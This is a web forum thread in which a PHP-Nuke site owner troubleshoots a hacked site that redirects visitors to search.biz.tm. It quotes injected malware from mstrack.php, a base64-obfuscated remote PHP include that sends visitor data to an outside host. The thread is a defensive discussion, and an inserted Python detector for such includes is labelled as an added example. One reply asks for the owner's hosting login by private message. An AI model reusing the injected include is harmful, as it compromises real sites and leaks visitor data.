


PHP-Nuke Security - Been hacked or have a question about securing your site? Here's the place.



Hijacked/Attacked

Anyone with the knowledge to help:
The code redirects to http://search.biz.tm

http://www.airsoft-norge.com
Try different menus.

The code is using JavaScript, and the web URL is split into several parts, so it's difficult to search for in the DB and PHP code.

The script is located just before the writecookie code.

Anyone?






Remove the index.html that is redirecting it... going to http://www.airsoft-norge.com/index.php works fine.






There's no index.html in the root dir, nor a /html tag at the end of the page doc.
This one is rather nasty...

I've uploaded part of the page doc at:
http://www.airsoft-norge.com/junk.txt

Since I can't paste script code here as an example... ;)

BTW, where's the writecookies code fitted? Can't find the module...
Anyone know?

What's this at the end of mstrack.php in the /modules/MS_Analysis directory:
Quote:
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>


---
Well... Now I've updated/upgraded from 7.5 to 7.6, all files overwritten, except for config.php...
Still the same when selecting different options in the menu (left side)...
AAAAAAarg!
---

Update 2:
Just before it redirects me, I get "No Access" in the top description of the window... and then it redirects me... Some function in PHP-Nuke?
Can't even access /modules/Your_Account or Search etc.
---
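
A file-side check for the kind of code quoted in the post above, as an added example that is not part of the original thread: it reassembles the argument of each PHP include/require, decoding `base64_decode()` string literals, and reports the ones that resolve to a remote URL. The function names and the sample file are constructed for illustration; the two encoded strings are the ones from the quoted mstrack.php snippet.

```python
import base64
import binascii
import re
# include / require / include_once / require_once, with an optional "("
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*", re.I)
# One operand of a PHP string concatenation
TERM_RE = re.compile(r"""
      base64_decode\(\s*["']([A-Za-z0-9+/=]*)["']\s*\)   # 1: encoded literal
    | "([^"\\$]*)"                                       # 2: plain "..." string
    | '([^'\\]*)'                                        # 3: plain '...' string
    | (\$\w+)                                            # 4: variable
""", re.X | re.I)
DOT_RE = re.compile(r"\s*\.\s*")
REMOTE_RE = re.compile(r"(?:https?|ftp)://", re.I)

def rebuild_argument(src, pos):
    """Reassemble the include argument; return (text, used_base64)."""
    parts, used_b64 = [], False
    while (m := TERM_RE.match(src, pos)):
        if m.group(1) is not None:
            try:
                parts.append(base64.b64decode(m.group(1), validate=True).decode("latin-1"))
            except binascii.Error:
                parts.append("<bad-base64>")
            used_b64 = True
        elif m.group(4):
            parts.append("{" + m.group(4) + "}")  # runtime value, kept symbolic
        else:
            parts.append(m.group(2) if m.group(2) is not None else m.group(3))
        dot = DOT_RE.match(src, m.end())
        if not dot:
            break
        pos = dot.end()
    return "".join(parts), used_b64

def find_remote_includes(php_source):
    """List every include/require whose rebuilt argument is a remote URL."""
    findings = []
    for inc in INCLUDE_RE.finditer(php_source):
        target, used_b64 = rebuild_argument(php_source, inc.end())
        if REMOTE_RE.match(target):
            line = php_source.count("\n", 0, inc.start()) + 1
            findings.append({"line": line, "target": target, "obfuscated": used_b64})
    return findings

# Constructed sample file: a normal include, then the include from the quoted snippet
INJECT = 'include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)'
SAMPLE = ('<?php\ninclude_once("mainfile.php");\n// legitimate module code\n'
          'error_reporting(0);$str="";if((' + INJECT + ')){} else {' + INJECT + ';}?>')
```

Run `find_remote_includes()` over the contents of every `.php` file under the web root; a hit with `obfuscated` set means the URL was hidden behind `base64_decode()`.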






It's very unlikely to be to do with the files. You'll need to go to your database, open up the nuke_config table and see if there are any redirects in the footer entries; also open up the nuke_messages table and look through those.






My nuke_config table:
Quote:

INSERT INTO `nuke_config` VALUES ('Airsoft Norge', 'http://www.airsoft-norge.com', '', 'Norges beste airsoft-side', 'September 2002', 'webmaster@airsoft-norge.com', 0, 'Aeolus', 'All logos and trademarks in this site are property of their respective owner. The comments and gallery images are property of their posters, all the rest © 2002-2005 by Airsoft Norge.<br><br><center><img src="/xml.gif"></center>\r\n<a href="/backend.php">NewsRSS</a>', '<br><form action="https://www.paypal.com/cgi-bin/webscr" method="post">\r\n<input type="hidden" name="cmd" value="_xclick">\r\n<input type="hidden" name="business" value="ipetter@gmail.com">\r\n<input type="hidden" name="item_name" value="Airsoft Norge">\r\n<input type="hidden" name="no_note" value="1">\r\n<input type="hidden" name="currency_code" value="USD">\r\n<input type="hidden" name="tax" value="0">\r\n<input type="image" src="https://www.paypal.com/en_US/i/btn/x-click-but04.gif" border="0" name="submit" alt="Make payments with PayPal - it''s fast, free and secure!">\r\n</form>', '<center><a href="http://www.phpnuke.org" target="_blank">PHP-Nuke Copyright © 2004</a><br>', 4096, 'Anonym', 5, 1, 1, 0, 1, 10, 10, 1, 20, 0, 1, 'Airsoft Norge', 'en-NO', 'norwegian', 'no_NO.ISO_8859-1', 0, 0, 0, 'me@yoursite.com', 'NEWS for my site', 'Hey! You got a new submission for your site.', 'webmaster', 'Mail sent from WebMail service at PHP-Nuke Powered Site\n- http://yoursite.com', 0, '/var/www/html/modules/WebMail/tmp/', 0, 0, 'modules/WebMail/attachments/', 'mail.airsoft-norge.com', 0, 'Your account', -1, 'modules/WebMail/images', 1, 1, 1, 1, 1000, 0, '*****', 'Web site engine''s code is Copyright &copy; 2002 by <a href="http://phpnuke.org"><font class=''footmsg_l''>PHP-Nuke</font></a>. All Rights Reserved. PHP-Nuke is Free Software released under the <a href="http://www.gnu.org"><font class=''footmsg_l''>GNU/GPL license</font></a>.', '7.6');



Nothing abnormal in nuke_messages.






If you want to pm me your hosting control panel login I'll take a look.

It would be far easier for me to look myself than sit here suggesting things to try all evening.






Hello,

I have the same problem with one of my MediaWiki sites and my Mambo portal. The wiki always redirected to search.biz.tm after using the search box; the Mambo portal is totally down because the code that was added to dozens of files doesn't work. I also heard of users of phpBB and other scripts who were affected.

The subdomain search.biz.tm belongs to a customer of a customer of a customer of AboveNet Communications Inc. who are investigating now. You can contact them at abuse@above.net.

Cheers



